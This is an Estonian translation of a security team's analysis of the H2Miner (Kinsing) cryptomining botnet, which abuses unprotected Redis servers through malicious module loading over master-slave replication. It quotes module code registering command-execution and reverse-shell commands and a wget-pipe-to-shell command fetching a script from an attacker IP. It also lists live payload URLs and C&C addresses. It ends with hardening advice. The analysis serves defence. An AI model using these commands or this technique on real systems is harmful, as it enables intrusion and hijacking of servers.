Ăks pĂ€ev tagasi rĂŒnnati ĂŒhe minu projekti serverit sarnase ussiga. Otsides vastust kĂŒsimusele "mis see tĂ€pselt oli?" leidsin suurepĂ€rase artikli Alibaba Cloud Security meeskonnalt. Kuna ma ei leidnud seda artiklit Habrist, otsustasin selle spetsiaalselt teie jaoks tĂ”lkida <3
Sissejuhatus
Hiljuti avastas Alibaba Cloudi turvameeskond Ă€kilise H2Miner puhangut. Selline pahavara kasutab autoriseerimise puudumist vĂ”i nĂ”rku paroole Redis, et pÀÀseda teie sĂŒsteemidesse, sĂŒnkroniseerides seejĂ€rel oma pahatahtliku mooduli slave'iga master-slave sĂŒnkroniseerimise kaudu ja lĂ”puks laadides selle pahatahtliku mooduli rĂŒnnatavasse masinasse ning tĂ€ites pahatahtlikud juhised.
Varasemalt toodi rĂŒnnakud teie sĂŒsteemide vastu peamiselt lĂ€bi meetodi, mis hĂ”lmas ajastatud ĂŒlesandeid vĂ”i SSH-vĂ”tmeid, mis salvestati teie masinasse pĂ€rast sissetungija sisse logimist Redis. Ănneks ei ole see meetod sageli kasutatav, kuna see toob kaasa lubade kontrolli probleeme vĂ”i erinevate sĂŒsteemide versioonide tĂ”ttu. Siiski vĂ”ib see pahatahtliku mooduli laadimise meetod otseselt kĂ€ivitada rĂŒndaja kĂ€sklusi vĂ”i pÀÀseda juurde shellile, mis on teie sĂŒsteemile ohtlik.
Suure arvu serverid Redis'e, mis on avatud internetis (peaaegu 1 miljon), kutsub Alibaba Cloudi turvameeskond sĂ”bralikult kasutajaid ĂŒles mitte andma Redis'ile juurdepÀÀsu internetist ning regulaarselt kontrollima oma paroolide usaldusvÀÀrsust ja ka selle suhtes, kas need on kiirelt Ă€raarvatavad.
H2Miner
H2Miner on Linuxi pĂ”histe sĂŒsteemide kaevandamis-botnet, mis vĂ”ib tungida teie sĂŒsteemi erinevatel viisidel, sealhulgas autoriseerimise puudumisest Hadoop yawni, Dockerisse ja Redis'i kaugkĂ€ivituskehtivuse (RCE) haavatavusest. Botnet töötab, laadides pahatahtlikke skripte ja pahavarasid teie andmete kaevandamiseks, laiendades rĂŒnnakut horisontaalselt ning sĂ€ilitades kĂ€skluse ja kontrolli (C&C) ĂŒhenduse.
Redis RCE
Teadmisi selle teema kohta jagas Pavel Toporkov ZeroNights 2018-l. PĂ€rast versiooni 4.0 toetab Redis vĂ€liste moodulite laadimise funktsiooni, mis vĂ”imaldab kasutajatel laadida C keeles kompileeritud so-faile, et tĂ€ita teatud Redis kĂ€sklusi. See funktsioon on kasulik, kuid sellel on nĂ”rkus, mille tĂ”ttu vĂ”ivad failid master-slave reĆŸiimis sĂŒnkroniseeruda slave'i kaudu fullresync reĆŸiimis. Seda saab kurjategija kasutada pahatahtlike so-failide edastamiseks. PĂ€rast edastamise lĂ”petamist laadivad rĂŒndajad mooduli rĂŒnnatavasse Redis eksemplarisse ja tĂ€idavad mis tahes kĂ€sku.
Pahatahtliku ussi analĂŒĂŒs
Hiljuti avastas Alibaba Cloudi turvameeskond, et H2Mineri pahatahtlike kaevandajate rĂŒhm on jĂ€rsult suurenenud. AnalĂŒĂŒsi kohaselt ilmneb rĂŒnnaku ĂŒldine protsess jĂ€rgmiselt:

H2Miner kasutab RCE Redis'i tĂ€ielikuks rĂŒnnakuks. Esiteks rĂŒndavad kurjategijad kaitsmata Redis servereid vĂ”i servereid, millel on nĂ”rgad paroolid.
SeejĂ€rel kasutavad nad kĂ€sku config set dbfilename red2.so failinime muutmiseks. PĂ€rast seda tĂ€idavad rĂŒndajad kĂ€sku slaveof master-slave replikatsiooni hosti aadressi seadmiseks.
Kui rĂŒnnatav Redis eksemplar loob master-slave ĂŒhenduse pahatahtliku Redis'iga, mis kuulub kurjategijale, saadab rĂŒndaja nakatatud mooduli koos fullresync kĂ€suga failide sĂŒnkroniseerimiseks. SeejĂ€rel laaditakse fail red2.so rĂŒnnatavale masinale. PĂ€rast seda kasutavad kurjategijad moodulit .\/red2.so selle so-faili laadimiseks. Moodul vĂ”ib tĂ€ita kurjategija kĂ€ske vĂ”i alustada tagurdusĂŒhendust (tagauks), et saada juurdepÀÀsu rĂŒnnatavale masinale.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
PĂ€rast pahatahtliku kĂ€su tĂ€itmist, nĂ€iteks / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, kustutab kurjategija varukoopia faili nime ja vĂ”tab sĂŒsteemimooduli vĂ€ljalaske, et kustutada jĂ€ljed. Siiski jÀÀb fail red2.so endiselt rĂŒnnatavale masinasse. Kasutajatel soovitatakse pöörata tĂ€helepanu kahtlaste failide olemasolule oma Redis eksemplari kaustas.
Lisaks teatud pahatahtlike protsesside kustutamisele ressursside varastamiseks, jĂ€rgnes rĂŒndaja pahatahtlikule stsenaariumile, laadides ĂŒles ja kĂ€ivitades binaarfailides pahavara, et . See tĂ€hendab, et protsessi nimi vĂ”i katalooge nimi, mis sisaldab kinsingâu, vĂ”ib viidata sellele, et see masin on selle viirusega nakatunud.
Tagasikerimise tulemuste kohaselt tÀidab pahavara peamiselt jÀrgmisi funktsioone:
- Failide laadimine ja nende kÀivitamine
- Kaevandamine
- C&C-ĂŒhenduse hoidmine ja rĂŒndaja kĂ€skude tĂ€itmine

Kasuta masscan'i vĂ€liseks skaneerimiseks, et laiendada mĂ”ju. Lisaks on C&C-serveri IP-aadress programmis kĂ”vasti krĂŒpteeritud ning rĂŒnnatud host suhtleb C&C-ĂŒhendusega HTTP-pĂ€ringute kaudu, kus zombisĂŒsteemi (rikkumisega serveri) informatsioon tuvastatakse HTTP-pealkirjas.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Teised rĂŒnnakumeetodid

Aadressid ja lingid, mida usaldustused kasutavad
/kinsing
âą 142.44.191.122/t.sh
âą 185.92.74.42/h.sh
âą 142.44.191.122/spr.sh
âą 142.44.191.122/spre.sh
âą 195.3.146.118/unk.sh
c&c
âą 45.10.88.102
âą 91.215.169.111
âą 139.99.50.255
âą 46.243.253.167
âą 195.123.220.193
Soovitus
Esiteks ei tohiks Redis olla avatud Interneti juurdepÀÀsuks ja peaks olema kaitstud usaldusvÀÀrse parooliga. Samuti on oluline, et kliendid kontrolliksid, et Redis'i kataloogist puudub fail red2.so ja et kinsing ei ole nime failis/protsessis hostis.
Allikas: habr.com
